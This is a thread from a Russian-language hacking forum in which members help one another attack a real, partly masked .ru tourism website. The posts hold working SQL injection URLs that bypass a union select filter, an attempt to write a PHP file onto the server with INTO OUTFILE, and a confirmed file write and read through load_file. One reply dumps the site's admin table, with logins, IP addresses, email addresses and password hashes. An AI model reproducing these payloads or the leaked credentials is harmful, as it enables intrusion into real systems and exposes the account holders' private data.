Старый 12.07.2011, 20:54   #1131
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от sHvEd Посмотреть сообщение
Помогло, но вот тупик, host: db.contoraname.com не пингуется,
и из под mysql консоли:Unknown MySQL server host 'db.contoraname.com'

В пхпинфо сайта на котором тот самый скрипт обращающийся к удаленной БД, есть строчка:
mysql.default_host 10.21.x.x , то бишь локальный..

В то же время:
в mysql.user, 68 хостов..

user'@'%
user'@'212.x.x.x
user'@'10.x.x.x
user'@'192.x.x.x
user'@'127.x.x.x

и так далее..

Т.е. наверняка есть доступ из вне?
Эти 68 хостов - это не хосты серверов с мускулом, а наоборот - айпишники, с которых подключаются юзеры.
Twost вне форума   Ответить с цитированием
Старый 12.07.2011, 20:58   #1132
sHvEd
 
Регистрация: 08.04.2011
Сообщений: 6
Репутация: 0
По умолчанию

Цитата:
Сообщение от Twost Посмотреть сообщение
Эти 68 хостов - это не хосты серверов с мускулом, а наоборот - айпишники, с которых подключаются юзеры.
Я знаю это, чел )) Прочти внимательнее )
sHvEd вне форума   Ответить с цитированием
Старый 12.07.2011, 21:02   #1133
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

ну и все, мускул в локалке, извне доступа нет
Andrey1800 вне форума   Ответить с цитированием
Старый 12.07.2011, 21:12   #1134
sHvEd
 
Регистрация: 08.04.2011
Сообщений: 6
Репутация: 0
По умолчанию

Как нет? А то, что:
user'@'212.x.x.x не говорит о том, что как раз таки извне и идет коннект под данным юзером??
sHvEd вне форума   Ответить с цитированием
Старый 12.07.2011, 21:59   #1135
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от sHvEd Посмотреть сообщение
Помогло, но вот тупик, host: db.contoraname.com не пингуется,
и из под mysql консоли:Unknown MySQL server host 'db.contoraname.com'

В то же время:
в mysql.user, 68 хостов..

user'@'%
user'@'212.x.x.x

Т.е. наверняка есть доступ из вне?
Это говорит о том, что мускул примет соединение с этих хостов, но firewall м.б. настроен на определенные ip,
среди которых нет твоего, а может настроен только на локальные соединения (т.е. правила могут быть более строгие, чем у мускула)
nikp вне форума   Ответить с цитированием
Старый 16.07.2011, 18:59   #1136
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Ещё какая то непонятная SQL;
Код:
http://www.***.ru/tourism/glc/maps.php?id=19'
Вроде бы всё подобрал, столбцов значит 29 штук, и выводится белая страница... хз как чё...
данную уязвимость раскрутить можно, или неуязвима?

Последний раз редактировалось Twost; 17.05.2013 в 12:48..
Nightmare вне форума   Ответить с цитированием
Старый 16.07.2011, 19:37   #1137
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Ещё какая то непонятная SQL;
Код:
http://www.***.ru/tourism/glc/maps.php?id=19'
Вроде бы всё подобрал, столбцов значит 29 штук, и выводится белая страница... хз как чё...
данную уязвимость раскрутить можно, или неуязвима?
Конечно, можно:

id=0
ip=87.224.188.131
login=webadmin
pass=8146c9a5df4471526d68694550d0cd68
status=1
bind=0
id=1
ip=87.224.188.131
login=marina
pass=f80b6383d767feb24333c7d460bed98c
status=1
bind=0
id=2
ip=87.224.188.131
login=klava
pass=779c182b88cc776ca7bc709c549a6f3f
status=1
bind=0
id=3
ip=87.224.188.131
login=Дилан
pass=3ab0d601b56f50ca2d618e33953e7033
status=1
bind=0
id=6
ip=87.224.217.160
login=redaktor
pass=cdf5dc4ecd071971369cb5e899dce5b6
status=1
bind=0
id=8
ip=87.224.188.131
login=olga
pass=310dcbbf4cce62f762a2aaa148d556bd
status=1
bind=0
id=9
ip=87.224.188.131
login=shmashka
pass=345f592d694b1ddb8c1ce5d94b0d251a
status=1
bind=0
id=10
ip=87.224.188.131
login=mash
pass=c3f864dccf91317fd642a23c623f9f11
status=1
bind=0
id=11
ip=87.224.187.237
login=poisk3@uralweb.ru
pass=9a866f49bc69633720ccb8abe6e546d9
status=1
bind=1
id=12
ip=87.224.169.222
login=lyzerklp_linkin
pass=26ac64420d9deb25e9b381dc97342e4c
status=1
bind=1
id=13
ip=87.224.188.131
login=trimaylov_s@uralweb.ru
pass=190eb3ccf6fa4c719ccdcc01229ffdb8
status=1
bind=1

Последний раз редактировалось Twost; 17.05.2013 в 12:49..
Flakt вне форума   Ответить с цитированием
Старый 16.07.2011, 20:30   #1138
napas_hd
 
Регистрация: 09.07.2010
Сообщений: 70
Репутация: 4
По умолчанию

Nightmare, там банальная фильтрация сочетания union select
Код:
http://***.ru/tourism/glc/maps.php?id=-1+union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,user(),28,29

Последний раз редактировалось Twost; 17.05.2013 в 12:49..
napas_hd вне форума   Ответить с цитированием
Старый 17.07.2011, 20:30   #1139
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Ещё вопрос по этому же сайту:
Код:
http://***.ru/tourism/glc/maps.php?id=-1+union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,count(*),28,29+from+information_schema.columns+into+outfile+'/usr-old/var/www/htdocs/albums/fotos/f/3d5/ass.php'+--+1
У текущего (www) мускул пользователя File_Priv = Y, Magic Quotes = off, полный путь тоже известен, и всё равно заливка никак не хочет работать...

Подскажите, что я тут не правильно делаю?
Даже если лить файл в /tmp/lol.php то всё равно выскакивают эти ошибки php как при неправильном синтаксическом запросе.... всё пробовал, и просто select 1,2,3 into outfile и с операторами from и так далее, ну не пашет никак ;(

Последний раз редактировалось Twost; 17.05.2013 в 12:49..
Nightmare вне форума   Ответить с цитированием
Старый 17.07.2011, 20:45   #1140
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Ещё вопрос по этому же сайту:
Код:
http://***.ru/tourism/glc/maps.php?id=-1+union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,count(*),28,29+from+information_schema.columns+into+outfile+'/usr-old/var/www/htdocs/albums/fotos/f/3d5/ass.php'+--+1
У текущего (www) мускул пользователя File_Priv = Y, Magic Quotes = off, полный путь тоже известен, и всё равно заливка никак не хочет работать...

Подскажите, что я тут не правильно делаю?
Даже если лить файл в /tmp/lol.php то всё равно выскакивают эти ошибки php как при неправильном синтаксическом запросе.... всё пробовал, и просто select 1,2,3 into outfile и с операторами from и так далее, ну не пашет никак ;(
Все льется прекрасно, ты просто диру невритабельную выбрал.
Цитата:
_ttp://***.ru/tourism/glc/maps.php?id=-1+/*!union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,'hello',28,29+into+outfi le+'/tmp/olo1olo'*/--+

_ttp://***.ru/tourism/glc/maps.php?id=-1+/*!union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,load_file('/tmp/olo1olo'),28,29*/--+

Последний раз редактировалось Twost; 17.05.2013 в 12:50..
Twost вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot